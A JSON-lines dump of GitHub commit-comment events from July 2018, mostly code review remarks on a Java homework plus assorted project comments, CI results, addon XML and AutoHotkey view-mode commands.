{"id":"7934082035","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633885,"position":27,"line":27,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T14:59:58Z","updated_at":"2018-07-08T14:59:58Z","author_association":"CONTRIBUTOR","body":"Instead of \"return 0;\" you probably wanted to say \"throw new ArgumentException(\"Char '\" + n + \"' is an invalid roman numeral digit\");\r\n:)"}},"created_at":"2018-07-08T14:59:58Z"}
{"id":"7934083982","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633894,"position":15,"line":15,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:01:00Z","updated_at":"2018-07-08T15:01:00Z","author_association":"CONTRIBUTOR","body":"But is you don't use \"switch\" - do cache the result of \"n.substring(0,1)\" in a variable, and not call that every line."}},"created_at":"2018-07-08T15:01:00Z"}
{"id":"7934085564","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29633895,"position":null,"line":null,"path":null,"commit_id":"a3ac9388b52b70d496e400a4bdfe9a36d8b88122","created_at":"2018-07-08T15:01:57Z","updated_at":"2018-07-08T15:01:57Z","author_association":"NONE","body":"64MB hash for LTC :)\r\n\r\nchanged and approved "}},"created_at":"2018-07-08T15:01:57Z"}
{"id":"7934086914","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633899,"position":9,"line":9,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:02:51Z","updated_at":"2018-07-08T15:02:51Z","author_association":"CONTRIBUTOR","body":"We usually, for debugging purposes and for other reasons, try not to touch the parameters we get. Store the trimmed string in a new variable."}},"created_at":"2018-07-08T15:02:51Z"}
{"id":"7934089576","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633903,"position":10,"line":10,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:04:40Z","updated_at":"2018-07-08T15:04:40Z","author_association":"CONTRIBUTOR","body":"And for long expressions, specifically ones with many similar function invocations - add a line break after or before each dot. (before or after is a stylistic choice, and I highly recommend breaking before a dot, so that each subsequent line starts with a dot)."}},"created_at":"2018-07-08T15:04:40Z"}
{"id":"7934092227","type":"CommitCommentEvent","actor":{"login":"BlockDeveloper1"},"repo":{"name":"Dixicoin-DXC/Dixicoin"},"payload":{"comment":{"id":29633908,"position":null,"line":null,"path":null,"commit_id":"4fdd2506b2ac7f18d3afcaafba68f71fda481f78","created_at":"2018-07-08T15:06:32Z","updated_at":"2018-07-08T15:06:32Z","author_association":"NONE","body":"Interesting fork. I like the reward algo transition."}},"created_at":"2018-07-08T15:06:32Z"}
{"id":"7934092251","type":"CommitCommentEvent","actor":{"login":"jasonxiaohan"},"repo":{"name":"jasonxiaohan/DataStructure"},"payload":{"comment":{"id":29633909,"position":null,"line":null,"path":null,"commit_id":"c534ecb16c1e3be5bbb5f5fe54f767dff0513dc7","created_at":"2018-07-08T15:06:33Z","updated_at":"2018-07-08T15:06:33Z","author_association":"OWNER","body":"0->NULL\r\n1->0->NULL\r\n2->1->0->NULL\r\n3->2->1->0->NULL\r\n4->3->2->1->0->NULL\r\n4->3->666->2->1->0->NULL"}},"created_at":"2018-07-08T15:06:33Z"}
{"id":"7934092748","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633911,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T15:06:55Z","updated_at":"2018-07-08T15:06:55Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2745 of 2931 tests passed, 72 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 206 tests had: EIO diffs.\n * 164 tests had: ESO small diffs.\n * 100 tests had: MTR small diffs.\n * 173 tests had: Table big diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 25 tests had: Table small diffs.\n * 7 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 437\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.65%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T15:06:55Z"}
{"id":"7934093402","type":"CommitCommentEvent","actor":{"login":"robertdfrench"},"repo":{"name":"heroku/django-heroku"},"payload":{"comment":{"id":29633912,"position":15,"line":64,"path":"django_heroku/core.py","commit_id":"9c3358048d446f165774a6bbb6789bc526e33735","created_at":"2018-07-08T15:07:21Z","updated_at":"2018-07-08T15:07:21Z","author_association":"NONE","body":"Hi @kennethreitz, I had a question about the middleware ordering here. The [documentation from Whitenoise](http://whitenoise.evans.io/en/stable/django.html#enable-whitenoise) says that it should be loaded *after* Django's security middleware. Is my understanding correct that `config['MIDDLEWARE_CLASSES']` will already contain `django.middleware.security.SecurityMiddleware` at this point, or will it get prepended later? "}},"created_at":"2018-07-08T15:07:21Z"}
{"id":"7934093884","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633913,"position":31,"line":31,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:07:40Z","updated_at":"2018-07-08T15:07:40Z","author_association":"CONTRIBUTOR","body":"For generic numbers - yes, that \" < 1\" makes sense because we can have negative values. For the method \"length\" of string - you can't. Use \" == 0\".\r\nBut don't do that either, and get used to \"str == null || str.isEmpty()\""}},"created_at":"2018-07-08T15:07:40Z"}
{"id":"7934094781","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"MarcinDomanskiGitUser1/marcin-domanski-kodilla-java2"},"payload":{"comment":{"id":29633919,"position":7,"line":7,"path":"kodilla-stream/src/main/java/com/kodilla/stream/array/ArrayIntStreamOperations.java","commit_id":"fa9762486647896c0573d6c1ea414afda02cb1b4","created_at":"2018-07-08T15:08:14Z","updated_at":"2018-07-08T15:08:14Z","author_association":"NONE","body":"Metoda getAverage powinna istnieć tylko w interfejsie. Nie musisz jej implementować jeśli jest to metoda statyczna"}},"created_at":"2018-07-08T15:08:14Z"}
{"id":"7934095711","type":"CommitCommentEvent","actor":{"login":"BrolAWE"},"repo":{"name":"BrolAWE/stepic_web_project"},"payload":{"comment":{"id":29633920,"position":null,"line":null,"path":null,"commit_id":"13fea908cb266c5616071f265c901585d72fda6d","created_at":"2018-07-08T15:08:53Z","updated_at":"2018-07-08T15:08:53Z","author_association":"OWNER","body":"Back"}},"created_at":"2018-07-08T15:08:53Z"}
{"id":"7934095844","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633921,"position":44,"line":44,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:08:58Z","updated_at":"2018-07-08T15:08:58Z","author_association":"CONTRIBUTOR","body":"Had you not used recursion you would have been able to trivially run \"cleanup\" in the RomanToInt method."}},"created_at":"2018-07-08T15:08:58Z"}
{"id":"7934099734","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29633922,"position":null,"line":null,"path":null,"commit_id":"7d107897e0cafdfcb4ee38926992c75d8e471e9e","created_at":"2018-07-08T15:11:28Z","updated_at":"2018-07-08T15:11:28Z","author_association":"CONTRIBUTOR","body":"There are 3 methods to merge PR's, Its the rebase or squash method(s) rather than the straight merge thats strips signatures. ;)\r\n\r\nThe thing with straight merges is that is also creates a merge commit ontop."}},"created_at":"2018-07-08T15:11:28Z"}
{"id":"7934100073","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633924,"position":49,"line":49,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:11:41Z","updated_at":"2018-07-08T15:11:41Z","author_association":"CONTRIBUTOR","body":"Wouldn't it be fun if instead of just printing the result - you would write \r\nif (RomanToInt(cleanup(\"MMXVIII\")) != 2018) {\r\n   throw new TestFailedException(\"Expression 'MMXVIII' should return '2018' but returned \" + RomanToInt(cleanup(\"MMXVIII\")));\r\n}\r\nThis way if you change your code and introduce a bug - next time you run main - it would crash and burn if this got the wrong result."}},"created_at":"2018-07-08T15:11:41Z"}
{"id":"7934100093","type":"CommitCommentEvent","actor":{"login":"liansky"},"repo":{"name":"mingge8888/fastclick"},"payload":{"comment":{"id":29633925,"position":null,"line":null,"path":null,"commit_id":"27ab5a5870972fff56c7090ce6986a57d969cd85","created_at":"2018-07-08T15:11:43Z","updated_at":"2018-07-08T15:11:43Z","author_association":"NONE","body":"我的项目中遇到输入框偶尔不能获取焦点，点了没有反应，你这个改动能修复好吗？"}},"created_at":"2018-07-08T15:11:43Z"}
{"id":"7934100273","type":"CommitCommentEvent","actor":{"login":"MuffinOverlord"},"repo":{"name":"IngSW-unipv/Progetto-M18"},"payload":{"comment":{"id":29633926,"position":7,"line":268,"path":"src/TradeCenter/TradeCenter.java","commit_id":"ab6c3e9c9a99e9c78bcb02aec4d7f77a8f171bbd","created_at":"2018-07-08T15:11:51Z","updated_at":"2018-07-08T15:11:51Z","author_association":"NONE","body":":("}},"created_at":"2018-07-08T15:11:51Z"}
{"id":"7934101184","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633927,"position":51,"line":51,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T15:12:29Z","updated_at":"2018-07-08T15:12:29Z","author_association":"CONTRIBUTOR","body":"Avoid useless empty lines. Keep your code tidy."}},"created_at":"2018-07-08T15:12:29Z"}
{"id":"7934101892","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":29633929,"position":null,"line":null,"path":null,"commit_id":"d3044bf75167f7badfcf5560c39d103911991b3a","created_at":"2018-07-08T15:12:54Z","updated_at":"2018-07-08T15:12:54Z","author_association":"COLLABORATOR","body":"When i come back from vaction ill will work on overlays. "}},"created_at":"2018-07-08T15:12:54Z"}
{"id":"7934102784","type":"CommitCommentEvent","actor":{"login":"stephentoub"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":29633931,"position":null,"line":null,"path":null,"commit_id":"3f4e0c7d2a281c2232fde6421b4a9fc18e889eac","created_at":"2018-07-08T15:13:30Z","updated_at":"2018-07-08T15:13:30Z","author_association":"MEMBER","body":"@ViktorHofer, where's the PR for this?  Was it reviewed?"}},"created_at":"2018-07-08T15:13:30Z"}
{"id":"7934104112","type":"CommitCommentEvent","actor":{"login":"bogdan7900"},"repo":{"name":"bogdan7900/hello-world"},"payload":{"comment":{"id":29633934,"position":4,"line":1,"path":"station_location","commit_id":"84c16bcb364b3084d2018bc63fb22b029d085bc5","created_at":"2018-07-08T15:14:26Z","updated_at":"2018-07-08T15:14:26Z","author_association":"OWNER","body":"What does this line do?"}},"created_at":"2018-07-08T15:14:26Z"}
{"id":"7934105544","type":"CommitCommentEvent","actor":{"login":"tambry"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29633938,"position":null,"line":null,"path":null,"commit_id":"7d107897e0cafdfcb4ee38926992c75d8e471e9e","created_at":"2018-07-08T15:15:21Z","updated_at":"2018-07-08T15:15:21Z","author_association":"MEMBER","body":"You're correct about merge commit merges!\r\n\r\nI personally prefer rebase merges, as I find merge commits unnecessary and distracting."}},"created_at":"2018-07-08T15:15:21Z"}
{"id":"7934107184","type":"CommitCommentEvent","actor":{"login":"iOiurson"},"repo":{"name":"osm-ui/react"},"payload":{"comment":{"id":29633939,"position":28,"line":23,"path":"src/components/IconPicker/IconPicker.js","commit_id":"68eefc59b31d92989f90a59cc1ed1939fde6e040","created_at":"2018-07-08T15:16:21Z","updated_at":"2018-07-08T15:16:21Z","author_association":"COLLABORATOR","body":"The [FontAwesome 5 npm module](https://www.npmjs.com/package/%40fortawesome%2Ffontawesome-free) does not include the category file, should we hard copy it into our bundle ?..."}},"created_at":"2018-07-08T15:16:21Z"}
{"id":"7934126013","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29633955,"position":null,"line":null,"path":null,"commit_id":"56a1518d157c59c099e75db39953f3619f0377c3","created_at":"2018-07-08T15:29:10Z","updated_at":"2018-07-08T15:29:10Z","author_association":"OWNER","body":"commit 56a1518"}},"created_at":"2018-07-08T15:29:10Z"}
{"id":"7934126284","type":"CommitCommentEvent","actor":{"login":"kevinphilip92"},"repo":{"name":"kevinphilip92/php2"},"payload":{"comment":{"id":29633956,"position":null,"line":null,"path":null,"commit_id":"6db074d3127d75775c99fa51e645431a83c54fc5","created_at":"2018-07-08T15:29:22Z","updated_at":"2018-07-08T15:29:22Z","author_association":"OWNER","body":"git 1"}},"created_at":"2018-07-08T15:29:22Z"}
{"id":"7934127646","type":"CommitCommentEvent","actor":{"login":"Ruinrut"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633960,"position":27,"line":23,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T15:30:16Z","updated_at":"2018-07-08T15:30:16Z","author_association":"NONE","body":"В Assert.Equals идет с начала ожидаемое значение а потом эталонное?"}},"created_at":"2018-07-08T15:30:16Z"}
{"id":"7934127855","type":"CommitCommentEvent","actor":{"login":"HUI-BA"},"repo":{"name":"windyzj/try_git"},"payload":{"comment":{"id":29633963,"position":null,"line":null,"path":null,"commit_id":"b7f396d1ba962524b06310480eeabe1389040493","created_at":"2018-07-08T15:30:24Z","updated_at":"2018-07-08T15:30:24Z","author_association":"NONE","body":"踏平一切"}},"created_at":"2018-07-08T15:30:24Z"}
{"id":"7934133455","type":"CommitCommentEvent","actor":{"login":"ViktorHofer"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":29633970,"position":null,"line":null,"path":null,"commit_id":"3f4e0c7d2a281c2232fde6421b4a9fc18e889eac","created_at":"2018-07-08T15:34:02Z","updated_at":"2018-07-08T15:34:02Z","author_association":"MEMBER","body":"See offline discussion."}},"created_at":"2018-07-08T15:34:02Z"}
{"id":"7934134522","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29633974,"position":null,"line":null,"path":null,"commit_id":"45e25b57c2f1dfe87b7dcecc602835f0a3e981e3","created_at":"2018-07-08T15:34:44Z","updated_at":"2018-07-08T15:34:44Z","author_association":"MEMBER","body":"#6178"}},"created_at":"2018-07-08T15:34:44Z"}
{"id":"7934134525","type":"CommitCommentEvent","actor":{"login":"arunupadhyay05"},"repo":{"name":"arunupadhyay05/ArunTestExamples"},"payload":{"comment":{"id":29633975,"position":null,"line":null,"path":null,"commit_id":"e5ee48ee42ab7f44cd9314ed120d44325a1e1aa0","created_at":"2018-07-08T15:34:44Z","updated_at":"2018-07-08T15:34:44Z","author_association":"OWNER","body":"# ArunTestExamples\r\n\r\nSection 1\r\n\tName: Arun Kumar Upadhyay\r\n\tYears of Experience: 11 years 0 months\r\n\r\nSection 2: \r\n\tBuild IDE: Version: Kepler Service Release 1, Build id: 20130919-0819\r\n\tJDK Version: java version \"1.8\"\r\n\tApplication Type: Spring Boot Application\r\n\r\nSection 3 \r\na)\tEclEmma scan Snapshot \r\nb)\tFinal Output Snapshot \r\nc)\tJunit Coverage Snapshot\r\nNote: (You can link directly to the raw version of an image from your image folder. Hence from section 1.1 if your GIT Link is : https://github.com/nescafe2018/intrvw_sq , then you can have the following text in your readme ![SonarLint] (https://github.com/nescafe2018/intrvw_sq/<Link of you image) )\r\n\r\nSection 4 \r\nLicensing \r\nA)\tTHE CODE DOES NOT HAVE ANY COPYRIGHT WHATSOEVER. \r\nb)\tTHE CODE IS NOT GOVERNED BY ANY LICENSES WHATSOEVER. \r\nc)\tTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR USERS OF THE CODE WOULD BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n"}},"created_at":"2018-07-08T15:34:44Z"}
{"id":"7934139650","type":"CommitCommentEvent","actor":{"login":"CrocoFR"},"repo":{"name":"CrocoFR/Stationeers-French-Translation"},"payload":{"comment":{"id":29633978,"position":null,"line":null,"path":null,"commit_id":"0d43394f6cef4dec0673ac61deeda55c12339f41","created_at":"2018-07-08T15:38:02Z","updated_at":"2018-07-08T15:38:02Z","author_association":"OWNER","body":"FRv180708"}},"created_at":"2018-07-08T15:38:02Z"}
{"id":"7934140967","type":"CommitCommentEvent","actor":{"login":"johanngoltz"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29633981,"position":5,"line":3,"path":"src/app/api/scenario.d.ts","commit_id":"20cac0e9a34cd4375f420f8f30d67c26d7131090","created_at":"2018-07-08T15:38:52Z","updated_at":"2018-07-08T15:38:52Z","author_association":"OWNER","body":"Bin verwirrt. Jan meinte, sie nehmen Name+Description, hat sich das wieder geändert?"}},"created_at":"2018-07-08T15:38:52Z"}
{"id":"7934141726","type":"CommitCommentEvent","actor":{"login":"andre-nguyen"},"repo":{"name":"MRASL/kinova-ros"},"payload":{"comment":{"id":29633982,"position":null,"line":null,"path":null,"commit_id":"2400703eadddd1f5ce2b24ae9fa600130f9d4bf5","created_at":"2018-07-08T15:39:23Z","updated_at":"2018-07-08T15:39:23Z","author_association":"MEMBER","body":"> I have changed the values of box size to small non-zero vaues\r\nThe commit you are commenting on does exactly that."}},"created_at":"2018-07-08T15:39:23Z"}
{"id":"7934142303","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29633983,"position":null,"line":null,"path":null,"commit_id":"7d107897e0cafdfcb4ee38926992c75d8e471e9e","created_at":"2018-07-08T15:39:47Z","updated_at":"2018-07-08T15:39:47Z","author_association":"CONTRIBUTOR","body":"You and me both.\r\n\r\nNM, speaking of distracting. sigh, Our pet died this early dawn in my arms and it wasn't a particularly peaceful death, Thinking about anything else to distract me from _that_ goes,  sadly not having any luck with that either... :bed::peace_symbol: :cat2:"}},"created_at":"2018-07-08T15:39:47Z"}
{"id":"7934145058","type":"CommitCommentEvent","actor":{"login":"PGPDevelopment"},"repo":{"name":"PGPDevelopment/PlayAround"},"payload":{"comment":{"id":29633985,"position":36,"line":36,"path":"README.md","commit_id":"32e89144790b2184f4f3f381343cd9df099d2e2c","created_at":"2018-07-08T15:41:35Z","updated_at":"2018-07-08T15:41:35Z","author_association":"OWNER","body":"**Create usage guide**"}},"created_at":"2018-07-08T15:41:35Z"}
{"id":"7934145202","type":"CommitCommentEvent","actor":{"login":"RainbowMiner"},"repo":{"name":"RainbowMiner/RainbowMiner"},"payload":{"comment":{"id":29633986,"position":5,"line":13,"path":"Miners/Ewbf.ps1","commit_id":"4e218693964ca11a334bef2f31079381afc56d84","created_at":"2018-07-08T15:41:41Z","updated_at":"2018-07-08T15:41:41Z","author_association":"OWNER","body":"Oh! Of course. Thank you :)"}},"created_at":"2018-07-08T15:41:41Z"}
{"id":"7934146389","type":"CommitCommentEvent","actor":{"login":"tomastepa"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29633988,"position":5,"line":3,"path":"src/app/api/scenario.d.ts","commit_id":"20cac0e9a34cd4375f420f8f30d67c26d7131090","created_at":"2018-07-08T15:42:28Z","updated_at":"2018-07-08T15:42:28Z","author_association":"COLLABORATOR","body":"Also in der API steht es so drin, wie es Michael geändert hat."}},"created_at":"2018-07-08T15:42:28Z"}
{"id":"7934148095","type":"CommitCommentEvent","actor":{"login":"johanngoltz"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29633990,"position":5,"line":3,"path":"src/app/api/scenario.d.ts","commit_id":"20cac0e9a34cd4375f420f8f30d67c26d7131090","created_at":"2018-07-08T15:43:43Z","updated_at":"2018-07-08T15:43:43Z","author_association":"OWNER","body":"Da steht aber auch drin, dass nach PUT ein Scenario zurückkommt. Vielleicht hat es einfach nicht geändert. "}},"created_at":"2018-07-08T15:43:43Z"}
{"id":"7934148974","type":"CommitCommentEvent","actor":{"login":"alejx"},"repo":{"name":"sidneys/iina"},"payload":{"comment":{"id":29633991,"position":null,"line":null,"path":null,"commit_id":"e275eb79841f5571b6a6b412e7f4c312d9981119","created_at":"2018-07-08T15:44:21Z","updated_at":"2018-07-08T15:44:21Z","author_association":"NONE","body":"Good to see that! Would you like to merge this into our main repo?"}},"created_at":"2018-07-08T15:44:21Z"}
{"id":"7934151824","type":"CommitCommentEvent","actor":{"login":"tomastepa"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29633997,"position":5,"line":3,"path":"src/app/api/scenario.d.ts","commit_id":"20cac0e9a34cd4375f420f8f30d67c26d7131090","created_at":"2018-07-08T15:46:19Z","updated_at":"2018-07-08T15:46:19Z","author_association":"COLLABORATOR","body":"@johanngoltz du hattest Recht. Haben jetzt mit dem Backend vereinbart, dass sie es so ändern, wie in der API Definition. Somit passt die Version von @Sta7e , vorausgesetzt es wurde überall geändert."}},"created_at":"2018-07-08T15:46:19Z"}
{"id":"7934154978","type":"CommitCommentEvent","actor":{"login":"hanugit1"},"repo":{"name":"hanugit1/apcc"},"payload":{"comment":{"id":29634000,"position":null,"line":null,"path":null,"commit_id":"75de60d2347aa9420054caa56c43b0e5b431c728","created_at":"2018-07-08T15:48:39Z","updated_at":"2018-07-08T15:48:39Z","author_association":"OWNER","body":"hj"}},"created_at":"2018-07-08T15:48:39Z"}
{"id":"7934157219","type":"CommitCommentEvent","actor":{"login":"Nickdv9"},"repo":{"name":"nobodytouchmyboost/android_device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29634001,"position":null,"line":null,"path":null,"commit_id":"dbe3f32ccd32da6c886848b0cd949f46ecc94b5a","created_at":"2018-07-08T15:50:14Z","updated_at":"2018-07-08T15:50:14Z","author_association":"CONTRIBUTOR","body":"There r a few other fixes\r\nPerfd does fix it.. But at ur own risk.. Since its causing me drains.. Which is why im experimenting her\r\nIt wont do any bad if u change the log level since its a common issue cause due to iteraction boost\r\nhttps://github.com/LineageOS/android_device_lenovo_YTX703-common/commit/d65afa3e9ad98a50c3b21962551e83242554e38d\r\nDescription of which can be found in this commit. This one however uses perfd to get around the error"}},"created_at":"2018-07-08T15:50:14Z"}
{"id":"7934158170","type":"CommitCommentEvent","actor":{"login":"fereshtemoradi"},"repo":{"name":"Jiankai-Sun/SVM"},"payload":{"comment":{"id":29634002,"position":50,"line":50,"path":"MATLAB Official Tutorials/Cross_Validated_SVM_Classifier_Using_Bayesian_Optimization.m","commit_id":"795d6c953104bc59a73f143cf02478aea71282e9","created_at":"2018-07-08T15:50:57Z","updated_at":"2018-07-08T15:50:57Z","author_association":"NONE","body":"what the output of this line?\r\nwhat the mean ~??"}},"created_at":"2018-07-08T15:50:57Z"}
{"id":"7934159794","type":"CommitCommentEvent","actor":{"login":"shandakova"},"repo":{"name":"AnastasiaShemyakinskaya/Application-configurator"},"payload":{"comment":{"id":29634004,"position":null,"line":null,"path":null,"commit_id":"98288f94edc195dae0feade2cbff0ccf43a59f43","created_at":"2018-07-08T15:52:04Z","updated_at":"2018-07-08T15:52:04Z","author_association":"COLLABORATOR","body":"for issue #22 "}},"created_at":"2018-07-08T15:52:04Z"}
{"id":"7934160195","type":"CommitCommentEvent","actor":{"login":"mesutto"},"repo":{"name":"mesutto/IMMD"},"payload":{"comment":{"id":29634005,"position":null,"line":null,"path":null,"commit_id":"4c268bfa97453b48839671d3103ee2de7e75acff","created_at":"2018-07-08T15:52:19Z","updated_at":"2018-07-08T15:52:19Z","author_association":"OWNER","body":"Bir kısmı PCB to Heat Sink, bir kısmı da PCB to PCB o deliklerin. Evet through hole olmasına gerek yok, onu değiştirebiliriz.\r\n\r\nKulakları da kısaltabiliriz ama kasanın dış çapını da bilmek lazım şu aşamada."}},"created_at":"2018-07-08T15:52:19Z"}
{"id":"7934160388","type":"CommitCommentEvent","actor":{"login":"moshe0371"},"repo":{"name":"moshe0371/Pegasus"},"payload":{"comment":{"id":29634006,"position":null,"line":null,"path":null,"commit_id":"65847508b4ec913a80f476a8a804e722348f15a5","created_at":"2018-07-08T15:52:28Z","updated_at":"2018-07-08T15:52:28Z","author_association":"OWNER","body":"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> \r\n<addons>\r\n \r\n<addon id=\"plugin.video.MyYoutube\" \r\nname=\"MyYoutube\" \r\nversion=\"1.0.4\" \r\n provider-name=\"Thunder\"> \r\n<requires> \r\n<import addon=\"script.module.urlresolver\"/> \r\n<import addon=\"xbmc.python\" version=\"2.1.0\"/> \r\n<import addon=\"script.module.requests\"/> \r\n<import addon=\"script.module.youtube.dl\" version=\"17.310.1a1\"/> \r\n</requires> \r\n<extension point=\"xbmc.python.pluginsource\" \r\nlibrary=\"default.py\"> \r\n<provides>video</provides> \r\n</extension> \r\n<extension point=\"xbmc.addon.metadata\"> \r\n<summary lang=\"he\"></summary> \r\n<description lang=\"he\">Youtube player</description> \r\n<platform>all</platform> \r\n</extension> \r\n</addon>\r\n \r\n</addons> "}},"created_at":"2018-07-08T15:52:28Z"}
{"id":"7934160646","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29634007,"position":null,"line":null,"path":null,"commit_id":"9177cb9fcb66f1ceaf4143ca55ededd0d8764d6d","created_at":"2018-07-08T15:52:40Z","updated_at":"2018-07-08T15:52:40Z","author_association":"NONE","body":"Hi. Let's say there is a White Rf2, and Black Bb6 \r\n\r\na) pos.slider_blockers return blockers between f2 and Bb6 only if there is only one such blocker\r\n\r\nb) so unless black has two DarkSquare bishop, \r\n` if ((popcount(rookBlockers) == 1) && (rookBlockers & pos.pieces(Them)))\r\n`\r\nshould always be the same as `rookBlockers & pos.pieces(Them)`\r\n\r\nc) your comment says //penalty if bishop pins rook.\r\nsince you exclude white blockers, you are not looking for relative rook pins, only at potential discovered attacks against the rook.  (and you are not looking at \"real pins\" since the king position is not involved.\r\n\r\nd) if your intent was to look at a rook pinned against king, this is not what this code does."}},"created_at":"2018-07-08T15:52:40Z"}
{"id":"7934162314","type":"CommitCommentEvent","actor":{"login":"SpectrixOfficial"},"repo":{"name":"SpectrumDevs/Spectrum"},"payload":{"comment":{"id":29634008,"position":null,"line":null,"path":null,"commit_id":"5280ec9bdfc61b4307da9fffb21afffbcf54c144","created_at":"2018-07-08T15:53:54Z","updated_at":"2018-07-08T15:53:54Z","author_association":"COLLABORATOR","body":"hot"}},"created_at":"2018-07-08T15:53:54Z"}
{"id":"7934163231","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"katahiromz/reactos"},"payload":{"comment":{"id":29634011,"position":null,"line":null,"path":null,"commit_id":"827e914b35d73622cb2229c88a0eb2625d7573a9","created_at":"2018-07-08T15:54:33Z","updated_at":"2018-07-08T15:54:33Z","author_association":"NONE","body":"Here are some non-tray commands:\r\n\r\nPostMessage, 0x111, 28713,,,ahk_class #32770 ; Large Icons\r\nPostMessage, 0x111, 28714,,,ahk_class #32770 ; Small Icons\r\nPostMessage, 0x111, 28715,,,ahk_class #32770 ; List\r\nPostMessage, 0x111, 28716,,,ahk_class #32770 ; Details\r\nPostMessage, 0x111, 28717,,,ahk_class #32770 ; Thumbnails\r\nPostMessage, 0x111, 28718,,,ahk_class #32770 ; Tiles\r\nPostMessage, 0x111, 30209,,,ahk_class #32770 ; Show in groups\r\nPostMessage, 0x111, 30210,,,ahk_class #32770 ; Name\r\nPostMessage, 0x111, 30211,,,ahk_class #32770 ; Size\r\nPostMessage, 0x111, 30212,,,ahk_class #32770 ; Type\r\nPostMessage, 0x111, 30213,,,ahk_class #32770 ; Date modified\r\nPostMessage, 0x111, 30214,,,ahk_class #32770 ; Date Created\r\nPostMessage, 0x111, 30215,,,ahk_class #32770 ; Date Accessed\r\nPostMessage, 0x111, 